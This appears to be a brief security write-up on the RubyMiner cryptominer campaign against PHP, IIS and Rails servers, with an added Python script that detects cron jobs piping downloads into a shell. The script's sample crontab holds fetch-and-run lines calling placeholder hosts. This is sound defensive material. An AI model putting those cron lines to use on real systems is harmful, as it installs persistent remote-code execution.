‘RubyMiner’ Cryptominer Affects 30% of WW Networks

During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool.

As monitored by our sensors and honeypots, the attacker attempts to use multiple web server vulnerabilities to inject the malicious code onto the vulnerable machines.

Among the targeted servers we found attacks on PHP, Microsoft IIS, and Ruby on Rails.

It is interesting to note that the scheduler isn’t just being told to run the mining process every hour; it is being told to run the whole process, which includes downloading the file from the server.
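One way to hunt for this kind of persistence on a host is sketched below. It is an added example, not code from the original report. It assumes the scheduler is cron and that the download-and-run step is a fetch tool piped into a shell; the tool lists, function names and the sample crontab are constructed for illustration.

```python
import re

# Assumed indicator lists: common download tools and shells.
FETCH = re.compile(r"\b(wget|curl|fetch)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(/\S+/)?(ba|da|z|k)?sh\b")
URL = re.compile(r"https?://[^\s'\"|;)]+")
FIELD = re.compile(r"^[\w*/,\-]+$")

def parse_entry(line):
    """Return (schedule, command) for a cron job line, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @hourly, @daily, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    if len(parts) < 6 or not all(FIELD.match(p) for p in parts[:5]):
        return None                               # env assignment or malformed
    return " ".join(parts[:5]), parts[5]

def runs_hourly_or_more(schedule):
    """True when the job fires in every hour of the day."""
    if schedule.startswith("@"):
        return schedule == "@hourly"
    return schedule.split()[1] in ("*", "*/1")

def find_fetch_and_run(crontab_text):
    """List (line_no, schedule, urls) for hourly jobs that pipe a download to a shell."""
    hits = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, cmd = entry
        if runs_hourly_or_more(schedule) and FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
            hits.append((no, schedule, URL.findall(cmd)))
    return hits

# Constructed sample crontab; hosts and paths are placeholders.
SAMPLE = """\
# constructed sample crontab, not taken from the article
MAILTO=""
15 3 * * 0 /usr/local/bin/rotate-logs.sh
0 * * * * wget -q -O - http://dl.example.invalid/payload | bash > /dev/null 2>&1
@hourly curl -s http://dl.example.invalid/payload|sh
30 2 * * * curl -s https://mirror.example.invalid/update.sh | sh
*/5 * * * * /usr/bin/curl -fsS https://status.example.invalid/ping
"""

if __name__ == "__main__":
    for hit in find_fetch_and_run(SAMPLE):
        print(hit)
```

Because a job like this fetches the file again on every run, killing the mining process or deleting the binary does not clean the host; the scheduler entry itself has to be removed.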

The previous attack also leveraged the vulnerability in Ruby on Rails, and shares some common features with the current attack.

